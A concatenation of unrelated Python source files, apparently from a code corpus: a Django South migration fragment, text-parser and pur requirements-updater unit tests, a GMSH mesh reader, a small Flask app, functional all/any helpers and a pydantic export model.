'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'fqdn': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'ip_str': ('django.db.models.fields.CharField', [], {'max_length': '39'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'domain.domain': {
'Meta': {'object_name': 'Domain', 'db_table': "'domain'"},
'delegated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_reverse': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'master_domain': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['domain.Domain']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'purgeable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'soa': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['soa.SOA']", 'null': 'True', 'blank': 'True'})
},
'nameserver.nameserver': {
'Meta': {'unique_together': "(('domain', 'server'),)", 'object_name': 'Nameserver', 'db_table': "'nameserver'"},
'addr_glue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'nameserver_set'", 'null': 'True', 'to': "orm['address_record.AddressRecord']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intr_glue': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'nameserver_set'", 'null': 'True', 'to': "orm['static_intr.StaticInterface']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'network.network': {
'Meta': {'unique_together': "(('ip_upper', 'ip_lower', 'prefixlen'),)", 'object_name': 'Network', 'db_table': "'network'"},
'dhcpd_raw_include': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'blank': 'True'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'blank': 'True'}),
'network_str': ('django.db.models.fields.CharField', [], {'max_length': '49'}),
'prefixlen': ('django.db.models.fields.PositiveIntegerField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['site.Site']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'vlan': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['vlan.Vlan']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'site.site': {
'Meta': {'unique_together': "(('name', 'parent'),)", 'object_name': 'Site', 'db_table': "'site'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['site.Site']", 'null': 'True', 'blank': 'True'})
},
'soa.soa': {
'Meta': {'unique_together': "(('primary', 'contact', 'description'),)", 'object_name': 'SOA', 'db_table': "'soa'"},
'contact': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'dirty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'expire': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1209600'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_signed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'minimum': ('django.db.models.fields.PositiveIntegerField', [], {'default': '180'}),
'primary': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'refresh': ('django.db.models.fields.PositiveIntegerField', [], {'default': '180'}),
'retry': ('django.db.models.fields.PositiveIntegerField', [], {'default': '86400'}),
'serial': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1368820989'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'})
},
'static_intr.staticinterface': {
'Meta': {'unique_together': "(('ip_upper', 'ip_lower', 'label', 'domain', 'mac'),)", 'object_name': 'StaticInterface', 'db_table': "'static_interface'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'dhcp_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dns_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'domain': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['domain.Domain']"}),
'fqdn': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_lower': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'ip_str': ('django.db.models.fields.CharField', [], {'max_length': '39'}),
'ip_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'ip_upper': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '17'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'reverse_domain': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'reverse_staticintr_set'", 'null': 'True', 'to': "orm['domain.Domain']"}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['system.System']", 'null': 'True', 'blank': 'True'}),
'ttl': ('django.db.models.fields.PositiveIntegerField', [], {'default': '3600', 'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['view.View']", 'symmetrical': 'False', 'blank': 'True'}),
'vrf': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['vrf.Vrf']", 'null': 'True', 'blank': 'True'}),
'workgroup': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['workgroup.Workgroup']", 'null': 'True', 'blank': 'True'})
},
'system.system': {
'Meta': {'unique_together': "(('name', 'location', 'department'),)", 'object_name': 'System', 'db_table': "'system'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'department': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'view.view': {
'Meta': {'unique_together': "(('name',),)", 'object_name': 'View', 'db_table': "'view'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'vlan.vlan': {
'Meta': {'unique_together': "(('name', 'number'),)", 'object_name': 'Vlan', 'db_table': "'vlan'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'number': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'vrf.vrf': {
'Meta': {'object_name': 'Vrf', 'db_table': "'vrf'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['network.Network']", 'null': 'True'})
},
'workgroup.workgroup': {
'Meta': {'object_name': 'Workgroup', 'db_table': "'workgroup'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
}
}
complete_apps = ['nameserver']
|
StarcoderdataPython
|
9703125
|
<filename>tests/test_create_features.py
# Lint as: python3
"""
test TextParsers
"""
import unittest
from src import text_parser
class TestCreateFeatures(unittest.TestCase):
def test_percent_uppercase(self):
text = "aA"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(0.5, uppercase)
text = "A"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(1, uppercase)
text = "a"
uppercase = text_parser.percent_uppercase(text)
self.assertEqual(0, uppercase)
def test_count_ref(self):
text = ">"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(1, num_ref)
text = "x"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(0, num_ref)
text = "x>"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(0, num_ref)
text = "x\n>"
num_ref = text_parser.count_reference_line(text)
self.assertEqual(1, num_ref)
def test_remove_ref(self):
text = ">"
text = text_parser.remove_reference(text)
self.assertEqual("", text)
text = "hello\n>x"
text = text_parser.remove_reference(text)
self.assertEqual("hello\n", text)
text = "hello\n>x\nhello"
text = text_parser.remove_reference(text)
self.assertEqual("hello\n\nhello", text)
def test_plus_one(self):
text = "+1"
num_plus_one = text_parser.count_plus_one(text)
self.assertEqual(1, num_plus_one)
text = ""
num_plus_one = text_parser.count_plus_one(text)
self.assertEqual(0, num_plus_one)
text = "+1"
clean = text_parser.sub_PlusOne(text)
print(clean)
self.assertEqual("plus one", clean)
text = "hello+1world"
clean = text_parser.sub_PlusOne(text)
self.assertEqual("helloplus oneworld", clean)
|
StarcoderdataPython
|
9638998
|
<gh_stars>0
# Demo Python Dictionaries - Dictionary
'''
Nested Dictionaries
A dictionary can also contain many dictionaries, this is called nested dictionaries.
'''
# Create a dictionary that contain three dictionaries:
myfamily = {
"child1" : {
"name" : "Emil",
"year" : 2004
},
"child2" : {
"name" : "Tobias",
"year" : 2007
},
"child3" : {
"name" : "Linus",
"year" : 2011
}
}
print(myfamily)
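# Access a value inside a nested dictionary by chaining the keys:
print(myfamily["child2"]["name"])  # prints "Tobias"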
|
StarcoderdataPython
|
3288768
|
<filename>lorem.py
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index2():
return render_template("index2.html")
@app.route("/more")
def more():
return render_template("more.html")
|
StarcoderdataPython
|
5004232
|
# -*- coding: utf-8 -*-
# pylint: disable=E1101,C0103
r"""@package gmsh
Contains utilities for reading data from a GMSH-generated mesh file
@author <NAME> (<EMAIL>)
"""
import numpy
import struct
class GmshElement(object):
"""Enumeration of GMSH element types"""
TRIANGLE = 2
QUAD = 3
class GmshFileReader(object):
"""Reads and processes a GMSH-generated file"""
__DIM = 3
__MAX_VERT = 4
__VERSION = '2.2'
__FILE_TYPE = '1'
__DATA_SIZE = '8'
def __init__(self, name):
"""Constructs a new reader object from the GMSH file name
@param name [@c string]: Name of the GMSH file
"""
self.name = name
def read_ascii(self):
"""Reads a GMSH .msh file in ASCII format
@retval elts [@c numpy.ndarray]: Element connectivity matrix
@retval verts [@c numpy.ndarray]: Vertex list
"""
with open(self.name, 'r') as f:
for line in f:
if '$Nodes' in line:
num_verts = int(f.next())
verts = numpy.empty((num_verts, GmshFileReader.__DIM))
for i in xrange(num_verts):
verts[i, :] = f.next().split()[1:]
elif '$Elements' in line:
num_elts = int(f.next())
elts = numpy.zeros((num_elts, GmshFileReader.__MAX_VERT),
dtype=numpy.int)
for i in xrange(num_elts):
words = f.next().split()
elt_type, num_tags = int(words[1]), int(words[2])
start_col = 3 + num_tags
if elt_type == GmshElement.TRIANGLE:
elts[i, :-1] = words[start_col:]
elif elt_type == GmshElement.QUAD:
elts[i, :] = words[start_col:]
if all(elts[:, -1] == 0):
elts = elts[:, :-1]
elts = elts[~numpy.all(elts == 0, axis=1)]
elts -= 1
break
return elts, verts
def read_binary(self):
"""Reads a GMSH .msh file in binary format
@retval elts [@c numpy.ndarray]: Element connectivity matrix
@retval verts [@c numpy.ndarray]: Vertex list
"""
with open(self.name, 'rb') as f:
if f.readline() != '$MeshFormat\n':
raise ValueError('Missing or bad GMSH file section header')
version, file_type, data_size = f.readline().split()
if version != GmshFileReader.__VERSION:
raise ValueError('Missing or bad GMSH file version number')
if file_type != GmshFileReader.__FILE_TYPE:
raise ValueError('Missing or bad GMSH file type')
if data_size != GmshFileReader.__DATA_SIZE:
raise ValueError('Missing or bad GMSH data size')
one = struct.unpack('i', f.read(4))[0]
if one & (1 << (8*4-1)):
raise ValueError('Endianness of GMSH file and system differ')
elif one != 1:
raise ValueError('Could not read GMSH endianness identifier')
f.read(1)
if f.readline() != '$EndMeshFormat\n':
raise ValueError('Missing or bad GMSH file section footer')
if f.readline() != '$Nodes\n':
raise ValueError('Missing or bad GMSH file section header')
num_verts = int(f.readline())
verts = numpy.empty((num_verts, GmshFileReader.__DIM))
for i in xrange(num_verts):
struct.unpack('i', f.read(4))
verts[i, :] = struct.unpack('%dd' % GmshFileReader.__DIM,
f.read(int(GmshFileReader.__DATA_SIZE) \
*GmshFileReader.__DIM))
f.read(1)
if f.readline() != '$EndNodes\n':
raise ValueError('Missing or bad GMSH file section footer')
if f.readline() != '$Elements\n':
raise ValueError('Missing or bad GMSH file section header')
num_elts = int(f.readline())
elts = numpy.zeros((num_elts, GmshFileReader.__MAX_VERT),
dtype=numpy.int)
elts_read = 0
while elts_read < num_elts:
elt_type, num_elts_following, num_tags = \
struct.unpack('3i', f.read(3*4))
if elt_type == GmshElement.TRIANGLE:
elt_verts = 3
elif elt_type == GmshElement.QUAD:
elt_verts = 4
else:
raise ValueError('Invalid element type')
for j in xrange(num_elts_following):
struct.unpack('%di' % (num_tags + 1),
f.read(4*(num_tags + 1)))
for k in xrange(elt_verts):
elts[elts_read, k] = struct.unpack('i', f.read(4))[0]
elts_read += 1
if all(elts[:, -1] == 0):
elts = elts[:, :-1]
elts = elts[~numpy.all(elts == 0, axis=1)]
elts -= 1
return elts, verts
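# Minimal illustrative use (mesh filename hypothetical; note this class is
# Python 2 code, as it relies on xrange and file.next()):
#   elts, verts = GmshFileReader('channel.msh').read_ascii()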
|
StarcoderdataPython
|
5095409
|
import unittest
import jinete as jit
from .abc import (
TestObjective,
)
class TestDialARideObjective(TestObjective):
def test_creation(self):
objective = jit.DialARideObjective()
self.assertEqual('Dial-a-Ride', objective.name)
def test_result(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.result),
)
def test_planning(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.planning),
)
def test_route(self):
objective = jit.DialARideObjective()
self.assertEqual(
(2, -40.0),
objective.optimization_function(self.route),
)
def test_stop(self):
objective = jit.DialARideObjective()
self.assertEqual(
(1, -2.0),
objective.optimization_function(self.stop),
)
def test_planning_trip(self):
objective = jit.DialARideObjective()
self.assertEqual(
(1, -2.0),
objective.optimization_function(self.planned_trip),
)
def test_best(self):
objective = jit.DialARideObjective()
self.assertEqual(
next(self.route.planned_trips),
objective.best(*self.route.planned_trips),
)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9677722
|
<reponame>oniani/pyfunctional
"""
This module implements all and an
functions from functional programming.
The implementations are based on all and any
functions of the Haskell programming language.
Author : <NAME>
Date : 04/23/2019
License: MIT
"""
from sys import setrecursionlimit
from typing import Callable, Sequence, Any
from pyfunctional.fold import foldr
setrecursionlimit(1_000_000)
def all(fun: Callable[[Any], bool], seq: Sequence[Any]) -> bool:
"""Implementation of all in Python3.
    This is an implementation of the all function
    from functional programming. See examples
    below.
    >>> all((lambda x: x > 0), [1, 2, 3])
    True
    >>> all((lambda x: x > 0), [0, 1, 2])
    False
"""
return foldr((lambda x, y: x and y), True, list(map(fun, seq)))
def any(fun: Callable[[Any], bool], seq: Sequence[Any]) -> bool:
"""Implementation of any in Python3.
This is an implementation of any function
from functional programming. See examples
below.
    >>> any((lambda x: x > 2), [1, 2, 3])
    True
    >>> any((lambda x: x > 3), [1, 2, 3])
    False
"""
return foldr((lambda x, y: x or y), False, list(map(fun, seq)))
|
StarcoderdataPython
|
3220609
|
import logging
from enum import Enum
from datetime import date
from pydantic import Field, root_validator
from typing import List, Optional
from .base import SnakeModel
logger = logging.getLogger(__name__)
class ExportDataType(str, Enum):
raw_data = "raw_data"
occupancy = "occupancy"
social_distancing = "social-distancing"
facemask_usage = "facemask-usage"
in_out = "in-out"
dwell_time = "dwell-time"
all_data = "all_data"
class ExportDTO(SnakeModel):
areas: Optional[List[str]] = Field([], example=["area1", "area2", "area3"])
all_areas: Optional[bool] = Field(False, example=True)
cameras: Optional[List[str]] = Field([], example=["camera1", "camera2"])
all_cameras: Optional[bool] = Field(False, example=True)
from_date: Optional[date] = Field(None, example="2020-12-01")
to_date: Optional[date] = Field(None, example="2020-12-02")
data_types: List[ExportDataType] = Field(example=["all_data"])
@root_validator
def validate_dates(cls, values):
from_date = values.get("from_date")
to_date = values.get("to_date")
if not any([from_date, to_date]):
            # No dates were sent, export data from the beginning of time
return values
elif not from_date or not to_date:
# Only one date was sent. It's an invalid range
raise ValueError("Invalid range of dates")
elif from_date > to_date:
raise ValueError("Invalid range of dates")
return values
@root_validator
def validate_entities(cls, values):
if not any([values.get("areas"), values.get("all_areas"), values.get("cameras"),
values.get("all_cameras")]):
logger.info("No cameras or areas were provided.")
raise ValueError("No cameras or areas were provided. You need to provide unless one camera or "
"area to call the export endpoint.")
return values
|
StarcoderdataPython
|
6532059
|
# -*- coding: utf-8 -*-
import os
import shutil
import tempfile
from pur import pur, update_requirements, __version__
from click.testing import CliRunner
from pip._internal.index import InstallationCandidate, PackageFinder, Link
from pip._internal.req.req_install import Version
from . import utils
from .utils import u
class PurTestCase(utils.TestCase):
def setUp(self):
self.runner = CliRunner()
self.maxDiff = None
def test_help_contents(self):
args = ['--help']
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(result.exit_code, 0)
self.assertIn('pur', u(result.output))
self.assertIn('Usage', u(result.output))
self.assertIn('Options', u(result.output))
def test_version(self):
args = ['--version']
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "pur, version {0}\n".format(__version__)
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
def test_updates_package(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_without_command_line(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = {
'input_file': requirements,
}
expected_result = {
'current': Version('0.9'),
'updated': True,
'latest': Version('0.10.1'),
'message': 'Updated flask: 0.9 -> 0.10.1',
'package': 'flask',
}
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = update_requirements(**args)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
self.assertEquals(result['flask'][0], expected_result)
def test_updates_package_in_nested_requirements(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_updates_package_in_nested_requirements_without_command_line(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = {
'input_file': requirements,
}
expected_result = {
'current': Version('0.9'),
'updated': True,
'latest': Version('0.10.1'),
'message': 'Updated readtime: 0.9 -> 0.10.1',
'package': 'readtime',
}
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
expected_requirements_nested = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = update_requirements(**args)
self.assertEquals(open(requirements).read(), expected_requirements)
self.assertEquals(open(requirements_nested).read(), expected_requirements_nested)
self.assertEquals(result['readtime'][0], expected_result)
def test_requirements_long_option_accepted(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['--requirement', requirements]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_updates_package_to_output_file(self):
tempdir = tempfile.mkdtemp()
output = os.path.join(tempdir, 'output.txt')
previous = open('tests/samples/requirements.txt').read()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--output', output]
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open('tests/samples/requirements.txt').read(), previous)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(output).read(), expected_requirements)
def test_updates_nested_requirements_to_output_file(self):
        tempdir = tempfile.mkdtemp()
output = os.path.join(tempdir, 'output.txt')
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '--output', output]
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
expected_requirements = expected_requirements.replace('-r requirements-nested.txt\n', open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read())
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
self.assertEquals(open(requirements_nested).read(), open('tests/samples/requirements-nested.txt').read())
self.assertEquals(open(requirements).read(), open('tests/samples/requirements-with-nested-reqfile.txt').read())
self.assertEquals(open(output).read(), expected_requirements)
def test_exit_code_from_no_updates(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements-up-to-date.txt', requirements)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 10)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 10)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_exit_code_from_some_updates(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements.txt')
shutil.copy('tests/samples/requirements.txt', requirements)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'flask'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 11)
expected_output = "Updated flask: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 11)
expected_requirements = open('tests/samples/results/test_updates_package').read()
self.assertEquals(open(requirements).read(), expected_requirements)
def test_exit_code_from_nested_requirements_file(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '--nonzero-exit-code']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertEqual(result.exception.code, 11)
expected_output = "Updated readtime: 0.9 -> 0.10.1\nAll requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 11)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements').read()
self.assertEquals(open(requirements).read(), expected_requirements)
expected_requirements = open('tests/samples/results/test_updates_package_in_nested_requirements_nested').read()
self.assertEquals(open(requirements_nested).read(), expected_requirements)
def test_no_recursive_option(self):
tempdir = tempfile.mkdtemp()
requirements = os.path.join(tempdir, 'requirements-with-nested-reqfile.txt')
requirements_nested = os.path.join(tempdir, 'requirements-nested.txt')
shutil.copy('tests/samples/requirements-with-nested-reqfile.txt', requirements)
shutil.copy('tests/samples/requirements-nested.txt', requirements_nested)
args = ['-r', requirements, '-n']
with utils.mock.patch('pip._internal.index.PackageFinder.find_all_candidates') as mock_find_all_candidates:
project = 'readtime'
version = '0.10.1'
link = Link('')
candidate = InstallationCandidate(project, version, link)
mock_find_all_candidates.return_value = [candidate]
result = self.runner.invoke(pur, args)
self.assertIsNone(result.exception)
expected_output = "All requirements up-to-date.\n"
self.assertEquals(u(result.output), u(expected_output))
self.assertEquals(result.exit_code, 0)
expected_requirements = open('tests/samples/requirements-with-nested-reqfile.txt').read()
self.assertEquals(open(requirements).read(), expected_requirements)
